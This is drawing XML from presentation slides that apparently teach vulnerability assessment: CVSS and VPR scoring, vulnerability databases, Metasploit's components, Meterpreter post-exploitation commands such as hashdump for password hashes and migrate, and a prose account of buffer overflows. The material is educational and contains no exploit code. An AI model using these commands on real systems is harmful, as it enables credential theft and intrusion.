        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1059754" y="4591988"/>
          <a:ext cx="5304469" cy="9175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106" tIns="97106" rIns="97106" bIns="97106" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="1" i="0" kern="1200" baseline="0"/>
            <a:t>Human-Factor Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>: Attacks like phishing that exploit human behavio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200"/>
            <a:t>r</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1059754" y="4591988"/>
        <a:ext cx="5304469" cy="9175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A984D-9BFF-4512-8A99-EAB101533A67}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0"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Common Vulnerability Scoring System (CVSS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            <a:t>Scores vulnerabilities based on factors like exploitability, impact, and availability.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200"/>
            <a:t>Scores range from 0 (None) to 10 (Critical).</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200"/>
            <a:t>Advantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200"/>
            <a:t>: Long-standing, popular, free.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0"/>
            <a:t>Disadvantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            <a:t>: Not designed for prioritization, often static scores.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6556AB75-E671-47A5-873B-916EC07768D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3614737"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t>Vulnerability Priority Rating (VPR)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200"/>
            <a:t>Focuses on the real-world risk a vulnerability poses to the specific organization.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200"/>
            <a:t>Advantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200"/>
            <a:t>: Modern, risk-driven, dynamic scores.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200"/>
            <a:t>Disadvantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200"/>
            <a:t>: Not open-source, commercial platform required.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3614737" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1787256F-ABA0-4DA3-BE17-5FCCF1F4E59F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7229475"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Vulnerability Research Resources</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7229475" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{83C4CBFC-67B9-40FF-BE11-D6F2FA892C87}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0"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NVD (National Vulnerability Database)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200"/>
            <a:t>: A comprehensive list of all public vulnerabilities (CVEs).</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2339975"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3FA681EE-CD68-40DA-A3F5-A7756E995A9B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3614737"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Exploit-DB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200"/>
            <a:t>: A repository of exploits for specific applications and software versions.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3614737" y="2339975"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{11BA2360-C4E1-4F61-854A-21BC11370288}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7229475" y="2339975"/>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a:t>Rapid7</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200"/>
            <a:t>: Another database that combines vulnerability information with exploit instructions for Metasploit.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7229475"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74B46-B3AB-420C-9ACE-8FB24A04CA82}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="11682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Metasploit is the most popular exploitation framework</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="139618"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7DF1C796-21A1-4922-98F3-DAD725B0C2DE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="63837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Metasploit Versions:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="661168"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EDB866F6-1F51-4F20-98C6-F7B4DB97EA2D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="115992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Metasploit Pro:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Commercial, with GUI, for automation and task management.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="1182718"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B9D060DD-8E2B-4A0C-8DC5-58AC26111184}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="168147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Metasploit Framework:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Open-source, command-line-based, widely used in penetration testing.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="1704268"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{30706354-438C-46A6-B64D-19293FA3DB25}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="220302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Main Components:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="2225818"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EBB49653-41C2-45C8-B287-7C49446E7483}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="272457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msfconsole:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Command-line interface.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="2747368"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{52E4B533-5A59-45EB-9D81-8825B2BCBC01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="324612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Modules:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Exploits, scanners, payloads, etc.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="3268918"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{05EC6760-5BAA-4A0C-BF8B-26665C1A5594}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3767679"/>
          <a:ext cx="10515600" cy="46683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i="0" kern="1200" baseline="0"/>
            <a:t>Tools:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Vulnerability research tools like msfvenom, pattern_create, etc.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="3790468"/>
        <a:ext cx="10470022" cy="4212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3445E7-0C1B-42EE-9E74-F0D08A64DF81}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1023132"/>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dirty="0"/>
            <a:t>exploits:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0" dirty="0"/>
            <a:t> Code that takes advantage of system vulnerabilities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1023132"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{562DBC2E-BA9C-413A-96B2-DA091289F5C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1997575" y="1023132"/>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Payloads:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Code executed on the target system (e.g., getting a shell).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1997575" y="1023132"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8A66F3D3-0304-4741-A8A6-36A2C97DB8D9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3995150" y="1023132"/>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Module Categories:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3995150" y="1023132"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{21B58D07-9D6B-4835-A7E0-768BDEF82D38}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2294316"/>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Auxiliary:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Scanners, fuzzers.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2294316"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{60AD2604-05B9-4E37-8C91-EB278FFB0581}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1997575" y="2294316"/>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Encoders &amp; Evasion:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> For obfuscation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1997575" y="2294316"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2ABA6BC6-001A-489B-9869-97C53EADE9EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3995150" y="2294316"/>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NOPs:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Used as buffers in payloads.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3995150" y="2294316"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{93AE452F-A568-415C-BC88-60FF84BA25B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3565500"/>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Payloads:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Self-contained, staged, or split into stagers and stages.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3565500"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2E1FB6F7-9CD4-44FC-B1A7-DC3C600DFD20}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1997575" y="3565500"/>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baseline="0"/>
            <a:t>Metasploit Commands:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1997575" y="3565500"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C9DFE228-4138-4B53-9921-4E2E9EC0BAF7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3995150" y="3565500"/>
          <a:ext cx="1815977" cy="1089586"/>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baseline="0"/>
            <a:t>use to select modules, search for exploits, exploit to run, set to configure parameters.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3995150" y="3565500"/>
        <a:ext cx="1815977" cy="10895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591548-E246-458E-97D2-E81065480C3A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="10022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baseline="0"/>
            <a:t>Common Meterpreter Commands:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="120613"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2A546C41-F30E-4DD2-B93F-749E38C4D30E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="56687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getuid: Shows current user.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="587263"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC6D4EA5-4ADF-427B-AFC7-87C940916112}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="103352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ps: Lists running processes.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="1053913"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC674932-F46F-4D16-93DC-D7029D44BF68}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="150017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dirty="0"/>
            <a:t>migrate [PID]: Moves Meterpreter to another process.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="1520563"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0D844CAF-9E8A-4E4B-B10E-64AF76F5D7A0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="196682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hashdump: Dumps password hashes from the SAM database.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="1987213"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EDB0521B-842A-4568-A04E-F67BA6338D0B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2433473"/>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search: Locates files on the target system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="2453863"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E967CF88-45B4-4213-ADC4-9CB269F40D61}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2900124"/>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shell: Opens a command-line shell on the target.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="2920514"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F64B03BC-E257-4774-8FC0-C403B96CBA99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3366774"/>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i="0" kern="1200" baseline="0"/>
            <a:t>Post-Exploitation with Meterpreter:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="3387164"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9261F9A8-1A7D-47C7-9A52-E29B20F2EFCC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3833424"/>
          <a:ext cx="10515600" cy="41769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i="0" kern="1200" baseline="0"/>
            <a:t>Privilege escalation, lateral movement, credential harvesting, and file searches are key post-exploitation tasks.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="3853814"/>
        <a:ext cx="10474820" cy="3769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57C07-7A1F-44F1-809E-64C8EAC4CE73}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5214"/>
          <a:ext cx="7559504" cy="1510396"/>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Special attack that exploits the lack of input length validation to a buffer.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="73731" y="78945"/>
        <a:ext cx="7412042" cy="1362934"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1F0FF97D-C5C7-4F42-8DB8-02DB81EBDEA5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1593371"/>
          <a:ext cx="7559504" cy="1510396"/>
        </a:xfrm>
        <a:prstGeom prst="round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After that it overwrite the adjacent memory next to the buffer.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="73731" y="1667102"/>
        <a:ext cx="7412042" cy="1362934"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16A0FE2A-5E7D-481C-8BA0-3EA62BB3D272}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3181528"/>
          <a:ext cx="7559504" cy="1510396"/>
        </a:xfrm>
        <a:prstGeom prst="round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 can exploit this behavior by overwriting the return address and make it point to my exploit in the machine.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="73731" y="3255259"/>
        <a:ext cx="7412042" cy="1362934"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F6AE7433-5EEC-4378-A05D-F3A839F6AD87}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4769685"/>
          <a:ext cx="7559504" cy="1510396"/>
        </a:xfrm>
        <a:prstGeom prst="round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Once the return address is overwritten and the function running is finished the machine will jump to the malicious code and execute it.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="73731" y="4843416"/>
        <a:ext cx="7412042" cy="13629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AE1B-884F-4774-B933-5D47C3004D94}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="39687"/>
          <a:ext cx="3286125" cy="1971675"/>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0" i="0" kern="1200"/>
            <a:t>To grab the banner from a specific service :</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
